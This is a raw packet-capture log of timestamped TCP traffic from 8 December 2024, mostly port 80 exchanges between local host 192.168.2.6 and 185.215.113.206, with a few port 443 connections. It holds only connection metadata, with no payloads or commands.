Dec 8, 2024 13:31:51.184418917 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.185000896 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.185019970 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.185100079 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.185864925 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.186000109 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.186139107 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.186719894 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.186902046 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.186912060 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.187127113 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.187578917 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.187654972 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.187756062 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.188405037 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.188524008 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.188549042 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.189280987 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.189335108 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.189356089 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.189433098 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.190139055 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.190251112 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.190279961 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.190969944 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.191049099 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.191076994 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.191330910 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.191808939 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.191931009 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.191946983 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.192677975 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.192802906 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.192915916 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.193145990 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.193523884 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.193659067 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.193716049 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.193716049 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.194364071 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.194513083 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.194542885 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.194885015 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.195235014 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.195363045 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.195463896 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.196064949 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.196229935 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.196280003 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.196280956 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.196942091 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.197072029 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.197098970 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.197400093 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.197830915 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.197916985 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.197974920 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.197974920 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.198635101 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.198750973 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.198801994 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.199157953 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.199475050 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.199596882 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.199744940 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.200346947 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.200480938 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.200532913 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.200532913 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.201119900 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.201235056 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.279124975 CET	443	49845	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:51.279210091 CET	443	49845	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:51.279261112 CET	49845	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:51.279551983 CET	49845	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:51.279578924 CET	443	49845	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:51.279634953 CET	49845	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:51.279642105 CET	443	49845	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:51.282633066 CET	49851	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:51.282671928 CET	443	49851	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:51.282773972 CET	49851	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:51.283118963 CET	49851	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:51.283138990 CET	443	49851	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:51.299155951 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.315417051 CET	443	49846	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:51.315932035 CET	49846	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:51.315948009 CET	443	49846	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:51.316484928 CET	49846	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:51.316489935 CET	443	49846	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:51.421128988 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.654707909 CET	443	49847	150.171.28.10	192.168.2.6
Dec 8, 2024 13:31:51.654858112 CET	49847	443	192.168.2.6	150.171.28.10
Dec 8, 2024 13:31:51.655252934 CET	49847	443	192.168.2.6	150.171.28.10
Dec 8, 2024 13:31:51.655270100 CET	443	49847	150.171.28.10	192.168.2.6
Dec 8, 2024 13:31:51.655570984 CET	49847	443	192.168.2.6	150.171.28.10
Dec 8, 2024 13:31:51.655585051 CET	443	49847	150.171.28.10	192.168.2.6
Dec 8, 2024 13:31:51.751907110 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.751980066 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.752053022 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.752130985 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.752254963 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.752378941 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.752512932 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.752552032 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.752656937 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.753232956 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.753308058 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.753433943 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.753510952 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.754100084 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.754189014 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.754215956 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.754304886 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.754951954 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.755052090 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.755076885 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.755131006 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.755806923 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.755886078 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.755894899 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.755995989 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.756681919 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.756793976 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.756822109 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.756942987 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.757203102 CET	443	49846	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:51.757271051 CET	443	49846	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:51.757529974 CET	49846	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:51.757529974 CET	49846	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:51.757579088 CET	49846	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:51.757581949 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.757592916 CET	443	49846	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:51.757695913 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.757719994 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.757772923 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.758389950 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.758474112 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.758497000 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.759190083 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.759241104 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.759268999 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.759279966 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.760072947 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.760196924 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.760217905 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.760250092 CET	49852	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:51.760282993 CET	443	49852	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:51.760301113 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.760541916 CET	49852	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:51.760595083 CET	49852	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:51.760601997 CET	443	49852	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:51.760960102 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.761024952 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.761049986 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.761099100 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.761776924 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.761817932 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.761842966 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.762029886 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.762651920 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.762741089 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.762784958 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.763144970 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.763556004 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.763617992 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.763641119 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.763729095 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.764302969 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.764405012 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.764435053 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.764540911 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.765180111 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.765233040 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.766225100 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.766366005 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.766391039 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.767232895 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.767297983 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.767328024 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.767800093 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.767863989 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.767889023 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.768564939 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.768594027 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.768739939 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.768765926 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.768918037 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.769421101 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.769476891 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.769496918 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.769588947 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.770283937 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.770339012 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.770359993 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.770461082 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.771131039 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.771254063 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.771275043 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.771385908 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.771953106 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.772070885 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.772094965 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.772243023 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.772811890 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.772917032 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.772939920 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.773247957 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.773675919 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.773758888 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.773783922 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.773890018 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.774549007 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.774601936 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.774696112 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.774866104 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.775475025 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.775655031 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.776341915 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.776395082 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.776483059 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.776510000 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.776604891 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.777091980 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.777220011 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.777240992 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.777259111 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.777950048 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.778063059 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.778085947 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.778202057 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.778779984 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.778856039 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.778882027 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.779011965 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.779629946 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.779719114 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.779740095 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.779932022 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.780517101 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.780611038 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.780658007 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.781090975 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.781352043 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.781480074 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.781506062 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.781564951 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.782202959 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.782223940 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.782264948 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.782264948 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.783024073 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.783129930 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.783153057 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.783267975 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.783899069 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.783971071 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.784029961 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.784195900 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.784725904 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.784845114 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.784862041 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.785149097 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.785610914 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.785715103 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.785736084 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.785860062 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.786511898 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.786643982 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.786684036 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.786748886 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.787429094 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.787528038 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.787534952 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.787601948 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.788151026 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.788263083 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.788290977 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.788422108 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.789011955 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.789113045 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.789129019 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.789443016 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.789843082 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.789920092 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.789944887 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.790041924 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.790715933 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.790798903 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.790808916 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.790963888 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.791569948 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.791604996 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.791822910 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.792448997 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.792536020 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.792563915 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.792782068 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.793241978 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.793332100 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.793350935 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.793447971 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.794115067 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.794225931 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.794281006 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.794406891 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.794989109 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.795069933 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.795098066 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.795214891 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.795808077 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.795900106 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.795923948 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.795975924 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.796664000 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.796771049 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.796792030 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.796958923 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.797568083 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.797625065 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.797915936 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.798391104 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.798492908 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.798537016 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.798641920 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.799175978 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.799259901 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.944176912 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.944251060 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.944297075 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.944411039 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.944578886 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.944653034 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.944659948 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.944698095 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.945425034 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.945477009 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.945606947 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.945657969 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.946273088 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.946326017 CET	49835	80	192.168.2.6	185.215.113.206
